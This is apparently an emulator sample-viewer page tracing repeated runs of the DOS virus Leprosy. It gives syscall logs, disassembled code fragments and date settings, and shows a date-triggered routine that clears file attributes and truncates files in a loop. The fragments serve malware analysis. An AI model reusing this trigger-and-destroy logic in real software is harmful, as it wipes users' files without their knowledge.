Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.47857.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:02.863653346Z 48 PC: 12b38 | Get DOS version
2018-12-17T22:26:02.866021846Z 44 PC: 12b40 | Get time 0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-17T22:26:02.868759703Z 26 PC: 12b4b | Set disk transfer address
2018-12-17T22:26:02.870366504Z 25 PC: 12b4f | Get default drive
2018-12-17T22:26:02.87221479Z 71 PC: 12b5a | Get current directory
2018-12-17T22:26:02.876189818Z 59 PC: 12b61 | Change current directory
2018-12-17T22:26:02.881427294Z 78 PC: 12b6b | Find first file
2018-12-17T22:26:02.893741591Z 87 PC: 12c4f | Get or set file date and time
2018-12-17T22:26:02.897374877Z 67 PC: 12c5b | Get or set file attributes
2018-12-17T22:26:02.899555461Z 59 PC: 12c62 | Change current directory
2018-12-17T22:26:02.904330516Z 59 PC: 12c69 | Change current directory
2018-12-17T22:26:02.907007962Z 42 PC: 12c6d | Get date 0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-17T22:26:02.909633601Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:24.927690169Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:24.929254991Z 44 PC: 12b40 | Get time 0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:24.931115781Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:24.932402124Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:24.934439508Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:24.939836994Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:24.945870546Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:24.952169123Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:24.956209619Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:24.958477889Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:24.962394387Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:24.964015054Z 42 PC: 12c6d | Get date 0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:24.96644679Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.086379651Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.088282228Z 44 PC: 12b40 | Get time 0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.090636122Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.091728046Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.092865899Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.099153536Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.103529463Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.109903184Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.112190749Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.11405074Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.118544157Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.121254641Z 42 PC: 12c6d | Get date 0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.124000932Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.210141284Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.212634348Z 44 PC: 12b40 | Get time 0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.215010641Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.216099256Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.217214283Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.220211751Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.224246633Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.230341471Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.232256939Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.23404627Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.238419008Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.241277679Z 42 PC: 12c6d | Get date 0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.245212912Z 26 PC: 12c83 | Set disk transfer address
2018-12-25T11:52:25.247085675Z 78 PC: 12c8d | Find first file
2018-12-25T11:52:25.263069916Z 67 PC: 12c96 | Get or set file attributes
2018-12-25T11:52:25.273867162Z 60 PC: 12c9d | Create or truncate file
2018-12-25T11:52:27.060851215Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:27.064343046Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:27.657347994Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:27.824491669Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:27.828311514Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:28.298543585Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:28.903826981Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:28.907664136Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.016698442Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.156887984Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.169666502Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.185082318Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.19944993Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.202612365Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.214330645Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.227789139Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.230832164Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.244315182Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.258492462Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.261686282Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.273278642Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.286981806Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.29001058Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.30821164Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.317880138Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.320395383Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.429879894Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.432160731Z 44 PC: 12b40 | Get time 0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.433860553Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.43481627Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.447841696Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.450900874Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.454814718Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.460905837Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.462052587Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.463337083Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.474266908Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.475947907Z 42 PC: 12c6d | Get date 0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.477962833Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')